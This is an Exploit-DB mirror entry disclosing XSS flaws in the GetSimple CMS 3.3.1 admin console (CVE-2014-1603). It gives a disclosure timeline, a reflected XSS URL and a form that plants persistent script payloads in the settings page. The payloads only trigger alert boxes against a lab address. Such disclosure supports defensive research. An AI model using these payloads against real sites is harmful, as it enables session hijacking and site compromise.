bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/43888.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

32 lines
No EOL
1.3 KiB
Text
Raw Blame History

PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1
CVE-2014-1603
by Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
Disclosure: 12/05/2014 / Last updated: 12/10/2014
Timeline:
04/11/2013 - Found bugs, produced proof of concept.
05/11/2013 - Communicated to the developer, which acknowledged receipt.
10/01/2014 - Politely asked the developer for progress, no response.
17/01/2014 - Received CVE number from MITRE.
20/01/2014 - Communicated CVE number to the developer, no response.
29/01/2014 - Politely asked the developer for progress, no response.
12/05/2014 - Public release.
==============================
Reflected XSS in plugin load page:
http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data&param="><script>alert(1)</script>
Persistent XSS in settings page:
<form name="input" action="http://192.168.56.101/getsimple/admin/settings.php" method="post">
<input type="text" name="user" value=""><script>alert(1);</script>">
<input type="text" name="email" value=""><script>alert(2);</script>">
<input type="text" name="name" value=""><script>alert(3);</script>">
<input type="hidden" name="submitted" value="Save Settings">
<input type="submit" value="Submit">
</form>
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
Reference in a new issue View git blame Copy permalink